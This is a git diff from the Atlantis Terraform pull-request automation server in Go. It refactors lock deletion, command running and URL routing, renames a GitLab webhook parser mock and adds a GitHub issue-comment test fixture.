+ comment := fmt.Sprintf("**Warning**: The plan for dir: `%s` workspace: `%s` was **discarded** via the Atlantis UI.\n\n"+
+ "To `apply` you must run `plan` again.", lock.Project.Path, lock.Workspace)
err = l.VCSClient.CreateComment(lock.Pull.BaseRepo, lock.Pull.Num, comment)
if err != nil {
l.respond(w, logging.Error, http.StatusInternalServerError, "Failed commenting on pull request: %s", err)
return
}
} else {
- l.Logger.Debug("skipping commenting on pull request that lock was deleted because BaseRepo field is empty")
+ l.Logger.Debug("skipping commenting on pull request and deleting workspace because BaseRepo field is empty")
}
l.respond(w, logging.Info, http.StatusOK, "Deleted lock id %q", id)
}
diff --git a/server/locks_controller_test.go b/server/locks_controller_test.go
index e78f356b21..c7d6c1fa2e 100644
--- a/server/locks_controller_test.go
+++ b/server/locks_controller_test.go
@@ -11,7 +11,9 @@ import (
"github.com/gorilla/mux"
. "github.com/petergtz/pegomock"
"github.com/runatlantis/atlantis/server"
+ "github.com/runatlantis/atlantis/server/events"
"github.com/runatlantis/atlantis/server/events/locking/mocks"
+ mocks2 "github.com/runatlantis/atlantis/server/events/mocks"
"github.com/runatlantis/atlantis/server/events/models"
vcsmocks "github.com/runatlantis/atlantis/server/events/vcs/mocks"
"github.com/runatlantis/atlantis/server/logging"
@@ -187,6 +189,8 @@ func TestDeleteLock_CommentFailed(t *testing.T) {
RegisterMockTestingT(t)
cp := vcsmocks.NewMockClientProxy()
+ workingDir := mocks2.NewMockWorkingDir()
+ workingDirLocker := events.NewDefaultWorkingDirLocker()
When(cp.CreateComment(AnyRepo(), AnyInt(), AnyString())).ThenReturn(errors.New("err"))
l := mocks.NewMockLocker()
When(l.Unlock("id")).ThenReturn(&models.ProjectLock{
@@ -195,9 +199,11 @@ func TestDeleteLock_CommentFailed(t *testing.T) {
},
}, nil)
lc := server.LocksController{
- Locker: l,
- Logger: logging.NewNoopLogger(),
- VCSClient: cp,
+ Locker: l,
+ Logger: logging.NewNoopLogger(),
+ VCSClient: cp,
+ WorkingDir: workingDir,
+ WorkingDirLocker: workingDirLocker,
}
req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
req = mux.SetURLVars(req, map[string]string{"id": "id"})
@@ -212,6 +218,8 @@ func TestDeleteLock_CommentSuccess(t *testing.T) {
cp := vcsmocks.NewMockClientProxy()
l := mocks.NewMockLocker()
+ workingDir := mocks2.NewMockWorkingDir()
+ workingDirLocker := events.NewDefaultWorkingDirLocker()
pull := models.PullRequest{
BaseRepo: models.Repo{FullName: "owner/repo"},
}
@@ -224,9 +232,11 @@ func TestDeleteLock_CommentSuccess(t *testing.T) {
},
}, nil)
lc := server.LocksController{
- Locker: l,
- Logger: logging.NewNoopLogger(),
- VCSClient: cp,
+ Locker: l,
+ Logger: logging.NewNoopLogger(),
+ VCSClient: cp,
+ WorkingDirLocker: workingDirLocker,
+ WorkingDir: workingDir,
}
req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
req = mux.SetURLVars(req, map[string]string{"id": "id"})
@@ -234,6 +244,7 @@ func TestDeleteLock_CommentSuccess(t *testing.T) {
lc.DeleteLock(w, req)
responseContains(t, w, http.StatusOK, "Deleted lock id \"id\"")
cp.VerifyWasCalled(Once()).CreateComment(pull.BaseRepo, pull.Num,
- "**Warning**: The plan for path: `path` workspace: `workspace` was **discarded** via the Atlantis UI.\n\n"+
+ "**Warning**: The plan for dir: `path` workspace: `workspace` was **discarded** via the Atlantis UI.\n\n"+
"To `apply` you must run `plan` again.")
+ workingDir.VerifyWasCalledOnce().DeleteForWorkspace(pull.BaseRepo, pull, "workspace")
}
diff --git a/server/logging/logging_test.go b/server/logging/logging_test.go
index f5cf867ba0..1eb24dc29c 100644
--- a/server/logging/logging_test.go
+++ b/server/logging/logging_test.go
@@ -13,5 +13,4 @@
//
package logging_test
-// todo: actually test
// purposefully empty to trigger coverage report
diff --git a/server/mocks/mock_gitlab_request_parser.go b/server/mocks/mock_gitlab_request_parser.go
deleted file mode 100644
index e4598a1fe1..0000000000
--- a/server/mocks/mock_gitlab_request_parser.go
+++ /dev/null
@@ -1,84 +0,0 @@
-// Automatically generated by pegomock. DO NOT EDIT!
-// Source: github.com/runatlantis/atlantis/server (interfaces: GitlabRequestParser)
-
-package mocks
-
-import (
- http "net/http"
- "reflect"
-
- pegomock "github.com/petergtz/pegomock"
-)
-
-type MockGitlabRequestParser struct {
- fail func(message string, callerSkip ...int)
-}
-
-func NewMockGitlabRequestParser() *MockGitlabRequestParser {
- return &MockGitlabRequestParser{fail: pegomock.GlobalFailHandler}
-}
-
-func (mock *MockGitlabRequestParser) Validate(r *http.Request, secret []byte) (interface{}, error) {
- params := []pegomock.Param{r, secret}
- result := pegomock.GetGenericMockFrom(mock).Invoke("Validate", params, []reflect.Type{reflect.TypeOf((*interface{})(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
- var ret0 interface{}
- var ret1 error
- if len(result) != 0 {
- if result[0] != nil {
- ret0 = result[0].(interface{})
- }
- if result[1] != nil {
- ret1 = result[1].(error)
- }
- }
- return ret0, ret1
-}
-
-func (mock *MockGitlabRequestParser) VerifyWasCalledOnce() *VerifierGitlabRequestParser {
- return &VerifierGitlabRequestParser{mock, pegomock.Times(1), nil}
-}
-
-func (mock *MockGitlabRequestParser) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierGitlabRequestParser {
- return &VerifierGitlabRequestParser{mock, invocationCountMatcher, nil}
-}
-
-func (mock *MockGitlabRequestParser) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierGitlabRequestParser {
- return &VerifierGitlabRequestParser{mock, invocationCountMatcher, inOrderContext}
-}
-
-type VerifierGitlabRequestParser struct {
- mock *MockGitlabRequestParser
- invocationCountMatcher pegomock.Matcher
- inOrderContext *pegomock.InOrderContext
-}
-
-func (verifier *VerifierGitlabRequestParser) Validate(r *http.Request, secret []byte) *GitlabRequestParser_Validate_OngoingVerification {
- params := []pegomock.Param{r, secret}
- methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Validate", params)
- return &GitlabRequestParser_Validate_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
-}
-
-type GitlabRequestParser_Validate_OngoingVerification struct {
- mock *MockGitlabRequestParser
- methodInvocations []pegomock.MethodInvocation
-}
-
-func (c *GitlabRequestParser_Validate_OngoingVerification) GetCapturedArguments() (*http.Request, []byte) {
- r, secret := c.GetAllCapturedArguments()
- return r[len(r)-1], secret[len(secret)-1]
-}
-
-func (c *GitlabRequestParser_Validate_OngoingVerification) GetAllCapturedArguments() (_param0 []*http.Request, _param1 [][]byte) {
- params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
- if len(params) > 0 {
- _param0 = make([]*http.Request, len(params[0]))
- for u, param := range params[0] {
- _param0[u] = param.(*http.Request)
- }
- _param1 = make([][]byte, len(params[1]))
- for u, param := range params[1] {
- _param1[u] = param.([]byte)
- }
- }
- return
-}
diff --git a/server/mocks/mock_gitlab_request_parser_validator.go b/server/mocks/mock_gitlab_request_parser_validator.go
new file mode 100644
index 0000000000..c23738294a
--- /dev/null
+++ b/server/mocks/mock_gitlab_request_parser_validator.go
@@ -0,0 +1,84 @@
+// Automatically generated by pegomock. DO NOT EDIT!
+// Source: github.com/runatlantis/atlantis/server (interfaces: GitlabRequestParserValidator)
+
+package mocks
+
+import (
+ http "net/http"
+ "reflect"
+
+ pegomock "github.com/petergtz/pegomock"
+)
+
+type MockGitlabRequestParserValidator struct {
+ fail func(message string, callerSkip ...int)
+}
+
+func NewMockGitlabRequestParserValidator() *MockGitlabRequestParserValidator {
+ return &MockGitlabRequestParserValidator{fail: pegomock.GlobalFailHandler}
+}
+
+func (mock *MockGitlabRequestParserValidator) ParseAndValidate(r *http.Request, secret []byte) (interface{}, error) {
+ params := []pegomock.Param{r, secret}
+ result := pegomock.GetGenericMockFrom(mock).Invoke("ParseAndValidate", params, []reflect.Type{reflect.TypeOf((*interface{})(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+ var ret0 interface{}
+ var ret1 error
+ if len(result) != 0 {
+ if result[0] != nil {
+ ret0 = result[0].(interface{})
+ }
+ if result[1] != nil {
+ ret1 = result[1].(error)
+ }
+ }
+ return ret0, ret1
+}
+
+func (mock *MockGitlabRequestParserValidator) VerifyWasCalledOnce() *VerifierGitlabRequestParserValidator {
+ return &VerifierGitlabRequestParserValidator{mock, pegomock.Times(1), nil}
+}
+
+func (mock *MockGitlabRequestParserValidator) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierGitlabRequestParserValidator {
+ return &VerifierGitlabRequestParserValidator{mock, invocationCountMatcher, nil}
+}
+
+func (mock *MockGitlabRequestParserValidator) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierGitlabRequestParserValidator {
+ return &VerifierGitlabRequestParserValidator{mock, invocationCountMatcher, inOrderContext}
+}
+
+type VerifierGitlabRequestParserValidator struct {
+ mock *MockGitlabRequestParserValidator
+ invocationCountMatcher pegomock.Matcher
+ inOrderContext *pegomock.InOrderContext
+}
+
+func (verifier *VerifierGitlabRequestParserValidator) ParseAndValidate(r *http.Request, secret []byte) *GitlabRequestParserValidator_ParseAndValidate_OngoingVerification {
+ params := []pegomock.Param{r, secret}
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "ParseAndValidate", params)
+ return &GitlabRequestParserValidator_ParseAndValidate_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type GitlabRequestParserValidator_ParseAndValidate_OngoingVerification struct {
+ mock *MockGitlabRequestParserValidator
+ methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *GitlabRequestParserValidator_ParseAndValidate_OngoingVerification) GetCapturedArguments() (*http.Request, []byte) {
+ r, secret := c.GetAllCapturedArguments()
+ return r[len(r)-1], secret[len(secret)-1]
+}
+
+func (c *GitlabRequestParserValidator_ParseAndValidate_OngoingVerification) GetAllCapturedArguments() (_param0 []*http.Request, _param1 [][]byte) {
+ params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+ if len(params) > 0 {
+ _param0 = make([]*http.Request, len(params[0]))
+ for u, param := range params[0] {
+ _param0[u] = param.(*http.Request)
+ }
+ _param1 = make([][]byte, len(params[1]))
+ for u, param := range params[1] {
+ _param1[u] = param.([]byte)
+ }
+ }
+ return
+}
diff --git a/server/recovery/recovery_test.go b/server/recovery/recovery_test.go
index 0d53553159..4e2e247299 100644
--- a/server/recovery/recovery_test.go
+++ b/server/recovery/recovery_test.go
@@ -13,5 +13,4 @@
//
package recovery_test
-// todo: actually test
// purposefully empty to trigger coverage report
diff --git a/server/router.go b/server/router.go
new file mode 100644
index 0000000000..4f4e2840da
--- /dev/null
+++ b/server/router.go
@@ -0,0 +1,31 @@
+package server
+
+import (
+ "fmt"
+ "net/url"
+
+ "github.com/gorilla/mux"
+)
+
+// Router can be used to retrieve Atlantis URLs. It acts as an intermediary
+// between the underlying router and the rest of Atlantis that might need to
+// construct URLs to different resources.
+type Router struct {
+ // Underlying is the router that the routes have been constructed on.
+ Underlying *mux.Router
+ // LockViewRouteName is the named route for the lock view that can be Get'd
+ // from the Underlying router.
+ LockViewRouteName string
+ // LockViewRouteIDQueryParam is the query parameter needed to construct the
+ // lock view: underlying.Get(LockViewRouteName).URL(LockViewRouteIDQueryParam, "my id").
+ LockViewRouteIDQueryParam string
+ // AtlantisURL is the fully qualified URL (scheme included) that Atlantis is
+ // being served at, ex: https://example.com.
+ AtlantisURL string
+}
+
+// GenerateLockURL returns a fully qualified URL to view the lock at lockID.
+func (r *Router) GenerateLockURL(lockID string) string {
+ path, _ := r.Underlying.Get(r.LockViewRouteName).URL(r.LockViewRouteIDQueryParam, url.QueryEscape(lockID))
+ return fmt.Sprintf("%s%s", r.AtlantisURL, path)
+}
diff --git a/server/router_test.go b/server/router_test.go
new file mode 100644
index 0000000000..91bf9f3fc9
--- /dev/null
+++ b/server/router_test.go
@@ -0,0 +1,27 @@
+package server_test
+
+import (
+ "net/http"
+ "testing"
+
+ "github.com/gorilla/mux"
+ "github.com/runatlantis/atlantis/server"
+ . "github.com/runatlantis/atlantis/testing"
+)
+
+func TestRouter_GenerateLockURL(t *testing.T) {
+ queryParam := "queryparam"
+ routeName := "routename"
+ atlantisURL := "https://example.com"
+
+ underlyingRouter := mux.NewRouter()
+ underlyingRouter.HandleFunc("/lock", func(_ http.ResponseWriter, _ *http.Request) {}).Methods("GET").Queries(queryParam, "{queryparam}").Name(routeName)
+
+ router := &server.Router{
+ AtlantisURL: atlantisURL,
+ LockViewRouteIDQueryParam: queryParam,
+ LockViewRouteName: routeName,
+ Underlying: underlyingRouter,
+ }
+ Equals(t, "https://example.com/lock?queryparam=myid", router.GenerateLockURL("myid"))
+}
diff --git a/server/server.go b/server/server.go
index ee0ffdf119..7eaceb7e23 100644
--- a/server/server.go
+++ b/server/server.go
@@ -36,24 +36,34 @@ import (
"github.com/runatlantis/atlantis/server/events/locking"
"github.com/runatlantis/atlantis/server/events/locking/boltdb"
"github.com/runatlantis/atlantis/server/events/models"
- "github.com/runatlantis/atlantis/server/events/run"
+ "github.com/runatlantis/atlantis/server/events/runtime"
"github.com/runatlantis/atlantis/server/events/terraform"
"github.com/runatlantis/atlantis/server/events/vcs"
"github.com/runatlantis/atlantis/server/events/webhooks"
+ "github.com/runatlantis/atlantis/server/events/yaml"
"github.com/runatlantis/atlantis/server/logging"
"github.com/runatlantis/atlantis/server/static"
"github.com/urfave/cli"
"github.com/urfave/negroni"
)
-const LockRouteName = "lock-detail"
+const (
+ // LockViewRouteName is the named route in mux.Router for the lock view.
+ // The route can be retrieved by this name, ex:
+ // mux.Router.Get(LockViewRouteName)
+ LockViewRouteName = "lock-detail"
+ // LockViewRouteIDQueryParam is the query parameter needed to construct the lock view
+ // route. ex:
+ // mux.Router.Get(LockViewRouteName).URL(LockViewRouteIDQueryParam, "my id")
+ LockViewRouteIDQueryParam = "id"
+)
// Server runs the Atlantis web server.
type Server struct {
AtlantisVersion string
Router *mux.Router
Port int
- CommandHandler *events.CommandHandler
+ CommandRunner *events.DefaultCommandRunner
Logger *logging.SimpleLogger
Locker locking.Locker
AtlantisURL string
@@ -70,6 +80,7 @@ type Server struct {
// the config is parsed from a YAML file.
type UserConfig struct {
AllowForkPRs bool `mapstructure:"allow-fork-prs"`
+ AllowRepoConfig bool `mapstructure:"allow-repo-config"`
AtlantisURL string `mapstructure:"atlantis-url"`
DataDir string `mapstructure:"data-dir"`
GithubHostname string `mapstructure:"gh-hostname"`
@@ -94,8 +105,9 @@ type UserConfig struct {
// Config holds config for server that isn't passed in by the user.
type Config struct {
- AllowForkPRsFlag string
- AtlantisVersion string
+ AllowForkPRsFlag string
+ AllowRepoConfigFlag string
+ AtlantisVersion string
}
// WebhookConfig is nested within UserConfig. It's used to configure webhooks.
@@ -178,40 +190,24 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) {
return nil, err
}
lockingClient := locking.NewClient(boltdb)
- run := &run.Run{}
- configReader := &events.ProjectConfigManager{}
- workspaceLocker := events.NewDefaultAtlantisWorkspaceLocker()
- workspace := &events.FileWorkspace{
+ workingDirLocker := events.NewDefaultWorkingDirLocker()
+ workingDir := &events.FileWorkspace{
DataDir: userConfig.DataDir,
}
- projectPreExecute := &events.DefaultProjectPreExecutor{
- Locker: lockingClient,
- Run: run,
- ConfigReader: configReader,
- Terraform: terraformClient,
- }
- applyExecutor := &events.ApplyExecutor{
- VCSClient: vcsClient,
- Terraform: terraformClient,
- RequireApproval: userConfig.RequireApproval,
- Run: run,
- AtlantisWorkspace: workspace,
- ProjectPreExecute: projectPreExecute,
- Webhooks: webhooksManager,
+ projectLocker := &events.DefaultProjectLocker{
+ Locker: lockingClient,
}
- planExecutor := &events.PlanExecutor{
- VCSClient: vcsClient,
- Terraform: terraformClient,
- Run: run,
- Workspace: workspace,
- ProjectPreExecute: projectPreExecute,
- Locker: lockingClient,
- ProjectFinder: &events.DefaultProjectFinder{},
+ underlyingRouter := mux.NewRouter()
+ router := &Router{
+ AtlantisURL: userConfig.AtlantisURL,
+ LockViewRouteIDQueryParam: LockViewRouteIDQueryParam,
+ LockViewRouteName: LockViewRouteName,
+ Underlying: underlyingRouter,
}
pullClosedExecutor := &events.PullClosedExecutor{
- VCSClient: vcsClient,
- Locker: lockingClient,
- Workspace: workspace,
+ VCSClient: vcsClient,
+ Locker: lockingClient,
+ WorkingDir: workingDir,
}
logger := logging.NewSimpleLogger("server", nil, false, logging.ToLogLevel(userConfig.LogLevel))
eventParser := &events.EventParser{
@@ -226,22 +222,51 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) {
GitlabUser: userConfig.GitlabUser,
GitlabToken: userConfig.GitlabToken,
}
- commandHandler := &events.CommandHandler{
- ApplyExecutor: applyExecutor,
- PlanExecutor: planExecutor,
- LockURLGenerator: planExecutor,
- EventParser: eventParser,
+ defaultTfVersion := terraformClient.Version()
+ commandRunner := &events.DefaultCommandRunner{
VCSClient: vcsClient,
GithubPullGetter: githubClient,
GitlabMergeRequestGetter: gitlabClient,
CommitStatusUpdater: commitStatusUpdater,
- AtlantisWorkspaceLocker: workspaceLocker,
+ EventParser: eventParser,
MarkdownRenderer: markdownRenderer,
Logger: logger,
AllowForkPRs: userConfig.AllowForkPRs,
AllowForkPRsFlag: config.AllowForkPRsFlag,
+ ProjectCommandBuilder: &events.DefaultProjectCommandBuilder{
+ ParserValidator: &yaml.ParserValidator{},
+ ProjectFinder: &events.DefaultProjectFinder{},
+ VCSClient: vcsClient,
+ WorkingDir: workingDir,
+ WorkingDirLocker: workingDirLocker,
+ AllowRepoConfig: userConfig.AllowRepoConfig,
+ AllowRepoConfigFlag: config.AllowRepoConfigFlag,
+ },
+ ProjectCommandRunner: &events.DefaultProjectCommandRunner{
+ Locker: projectLocker,
+ LockURLGenerator: router,
+ InitStepRunner: &runtime.InitStepRunner{
+ TerraformExecutor: terraformClient,
+ DefaultTFVersion: defaultTfVersion,
+ },
+ PlanStepRunner: &runtime.PlanStepRunner{
+ TerraformExecutor: terraformClient,
+ DefaultTFVersion: defaultTfVersion,
+ },
+ ApplyStepRunner: &runtime.ApplyStepRunner{
+ TerraformExecutor: terraformClient,
+ },
+ RunStepRunner: &runtime.RunStepRunner{
+ DefaultTFVersion: defaultTfVersion,
+ },
+ PullApprovedChecker: vcsClient,
+ WorkingDir: workingDir,
+ Webhooks: webhooksManager,
+ WorkingDirLocker: workingDirLocker,
+ RequireApprovalOverride: userConfig.RequireApproval,
+ },
}
- repoWhitelist := &events.RepoWhitelist{
+ repoWhitelist := &events.RepoWhitelistChecker{
Whitelist: userConfig.RepoWhitelist,
}
locksController := &LocksController{
@@ -250,27 +275,28 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) {
Logger: logger,
VCSClient: vcsClient,
LockDetailTemplate: lockTemplate,
+ WorkingDir: workingDir,
+ WorkingDirLocker: workingDirLocker,
}
eventsController := &EventsController{
- CommandRunner: commandHandler,
- PullCleaner: pullClosedExecutor,
- Parser: eventParser,
- CommentParser: commentParser,
- Logger: logger,
- GithubWebHookSecret: []byte(userConfig.GithubWebHookSecret),
- GithubRequestValidator: &DefaultGithubRequestValidator{},
- GitlabRequestParser: &DefaultGitlabRequestParser{},
- GitlabWebHookSecret: []byte(userConfig.GitlabWebHookSecret),
- RepoWhitelist: repoWhitelist,
- SupportedVCSHosts: supportedVCSHosts,
- VCSClient: vcsClient,
+ CommandRunner: commandRunner,
+ PullCleaner: pullClosedExecutor,
+ Parser: eventParser,
+ CommentParser: commentParser,
+ Logger: logger,
+ GithubWebHookSecret: []byte(userConfig.GithubWebHookSecret),
+ GithubRequestValidator: &DefaultGithubRequestValidator{},
+ GitlabRequestParserValidator: &DefaultGitlabRequestParserValidator{},
+ GitlabWebHookSecret: []byte(userConfig.GitlabWebHookSecret),
+ RepoWhitelistChecker: repoWhitelist,
+ SupportedVCSHosts: supportedVCSHosts,
+ VCSClient: vcsClient,
}
- router := mux.NewRouter()
return &Server{
AtlantisVersion: config.AtlantisVersion,
- Router: router,
+ Router: underlyingRouter,
Port: userConfig.Port,
- CommandHandler: commandHandler,
+ CommandRunner: commandRunner,
Logger: logger,
Locker: lockingClient,
AtlantisURL: userConfig.AtlantisURL,
@@ -291,14 +317,8 @@ func (s *Server) Start() error {
s.Router.PathPrefix("/static/").Handler(http.FileServer(&assetfs.AssetFS{Asset: static.Asset, AssetDir: static.AssetDir, AssetInfo: static.AssetInfo}))
s.Router.HandleFunc("/events", s.EventsController.Post).Methods("POST")
s.Router.HandleFunc("/locks", s.LocksController.DeleteLock).Methods("DELETE").Queries("id", "{id:.*}")
- lockRoute := s.Router.HandleFunc("/lock", s.LocksController.GetLock).Methods("GET").Queries("id", "{id}").Name(LockRouteName)
- // function that planExecutor can use to construct detail view url
- // injecting this here because this is the earliest routes are created
- s.CommandHandler.SetLockURL(func(lockID string) string {
- // ignoring error since guaranteed to succeed if "id" is specified
- u, _ := lockRoute.URL("id", url.QueryEscape(lockID))
- return s.AtlantisURL + u.RequestURI()
- })
+ s.Router.HandleFunc("/lock", s.LocksController.GetLock).Methods("GET").
+ Queries(LockViewRouteIDQueryParam, fmt.Sprintf("{%s}", LockViewRouteIDQueryParam)).Name(LockViewRouteName)
n := negroni.New(&negroni.Recovery{
Logger: log.New(os.Stdout, "", log.LstdFlags),
PrintStack: false,
@@ -349,7 +369,7 @@ func (s *Server) Index(w http.ResponseWriter, _ *http.Request) {
var lockResults []LockIndexData
for id, v := range locks {
- lockURL, _ := s.Router.Get(LockRouteName).URL("id", url.QueryEscape(id))
+ lockURL, _ := s.Router.Get(LockViewRouteName).URL("id", url.QueryEscape(id))
lockResults = append(lockResults, LockIndexData{
LockURL: lockURL.String(),
RepoFullName: v.Project.RepoFullName,
diff --git a/server/server_test.go b/server/server_test.go
index aba146ef54..cec7a4fcb9 100644
--- a/server/server_test.go
+++ b/server/server_test.go
@@ -78,7 +78,7 @@ func TestIndex_Success(t *testing.T) {
r := mux.NewRouter()
atlantisVersion := "0.3.1"
// Need to create a lock route since the server expects this route to exist.
- r.NewRoute().Path("").Name(server.LockRouteName)
+ r.NewRoute().Path("").Name(server.LockViewRouteName)
s := server.Server{
Locker: l,
IndexTemplate: it,
@@ -103,6 +103,7 @@ func TestIndex_Success(t *testing.T) {
}
func responseContains(t *testing.T, r *httptest.ResponseRecorder, status int, bodySubstr string) {
+ t.Helper()
Equals(t, status, r.Result().StatusCode)
body, _ := ioutil.ReadAll(r.Result().Body)
Assert(t, strings.Contains(string(body), bodySubstr), "exp %q to be contained in %q", bodySubstr, string(body))
diff --git a/server/testfixtures/githubIssueCommentEvent.json b/server/testfixtures/githubIssueCommentEvent.json
new file mode 100644
index 0000000000..a15f67ed4a
--- /dev/null
+++ b/server/testfixtures/githubIssueCommentEvent.json
@@ -0,0 +1,207 @@
+{
+ "action": "created",
+ "issue": {
+ "url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1",
+ "repository_url": "https://api.github.com/repos/runatlantis/atlantis-tests",
+ "labels_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1/labels{/name}",
+ "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1/comments",
+ "events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1/events",
+ "html_url": "https://github.com/runatlantis/atlantis-tests/pull/1",
+ "id": 330256251,
+ "node_id": "MDExOlB1bGxSZXF1ZXN0MTkzMzA4NzA3",
+ "number": 1,
+ "title": "Add new project layouts",
+ "user": {
+ "login": "runatlantis",
+ "id": 1034429,
+ "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+ "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+ "gravatar_id": "",
+ "url": "https://api.github.com/users/runatlantis",
+ "html_url": "https://github.com/runatlantis",
+ "followers_url": "https://api.github.com/users/runatlantis/followers",
+ "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+ "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+ "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+ "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+ "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+ "repos_url": "https://api.github.com/users/runatlantis/repos",
+ "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+ "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+ "type": "User",
+ "site_admin": false
+ },
+ "labels": [
+
+ ],
+ "state": "open",
+ "locked": false,
+ "assignee": null,
+ "assignees": [
+
+ ],
+ "milestone": null,
+ "comments": 61,
+ "created_at": "2018-06-07T12:45:41Z",
+ "updated_at": "2018-06-13T12:53:40Z",
+ "closed_at": null,
+ "author_association": "OWNER",
+ "pull_request": {
+ "url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/1",
+ "html_url": "https://github.com/runatlantis/atlantis-tests/pull/1",
+ "diff_url": "https://github.com/runatlantis/atlantis-tests/pull/1.diff",
+ "patch_url": "https://github.com/runatlantis/atlantis-tests/pull/1.patch"
+ },
+ "body": ""
+ },
+ "comment": {
+ "url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/comments/396926483",
+ "html_url": "https://github.com/runatlantis/atlantis-tests/pull/1#issuecomment-396926483",
+ "issue_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1",
+ "id": 396926483,
+ "node_id": "MDEyOklzc3VlQ29tbWVudDM5NjkyNjQ4Mw==",
+ "user": {
+ "login": "runatlantis",
+ "id": 1034429,
+ "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+ "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+ "gravatar_id": "",
+ "url": "https://api.github.com/users/runatlantis",
+ "html_url": "https://github.com/runatlantis",
+ "followers_url": "https://api.github.com/users/runatlantis/followers",
+ "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+ "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+ "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+ "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+ "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+ "repos_url": "https://api.github.com/users/runatlantis/repos",
+ "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+ "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+ "type": "User",
+ "site_admin": false
+ },
+ "created_at": "2018-06-13T12:53:40Z",
+ "updated_at": "2018-06-13T12:53:40Z",
+ "author_association": "OWNER",
+ "body": "###comment body###"
+ },
+ "repository": {
+ "id": 136474117,
+ "node_id": "MDEwOlJlcG9zaXRvcnkxMzY0NzQxMTc=",
+ "name": "atlantis-tests",
+ "full_name": "runatlantis/atlantis-tests",
+ "owner": {
+ "login": "runatlantis",
+ "id": 1034429,
+ "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+ "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+ "gravatar_id": "",
+ "url": "https://api.github.com/users/runatlantis",
+ "html_url": "https://github.com/runatlantis",
+ "followers_url": "https://api.github.com/users/runatlantis/followers",
+ "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+ "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+ "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+ "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+ "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+ "repos_url": "https://api.github.com/users/runatlantis/repos",
+ "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+ "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+ "type": "User",
+ "site_admin": false
+ },
+ "private": false,
+ "html_url": "https://github.com/runatlantis/atlantis-tests",
+ "description": "A set of terraform projects that atlantis e2e tests run on.",
+ "fork": true,
+ "url": "https://api.github.com/repos/runatlantis/atlantis-tests",
+ "forks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/forks",
+ "keys_url": "https://api.github.com/repos/runatlantis/atlantis-tests/keys{/key_id}",
+ "collaborators_url": "https://api.github.com/repos/runatlantis/atlantis-tests/collaborators{/collaborator}",
+ "teams_url": "https://api.github.com/repos/runatlantis/atlantis-tests/teams",
+ "hooks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/hooks",
+ "issue_events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/events{/number}",
+ "events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/events",
+ "assignees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/assignees{/user}",
+ "branches_url": "https://api.github.com/repos/runatlantis/atlantis-tests/branches{/branch}",
+ "tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/tags",
+ "blobs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/blobs{/sha}",
+ "git_tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/tags{/sha}",
+ "git_refs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/refs{/sha}",
+ "trees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/trees{/sha}",
+ "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/{sha}",
+ "languages_url": "https://api.github.com/repos/runatlantis/atlantis-tests/languages",
+ "stargazers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/stargazers",
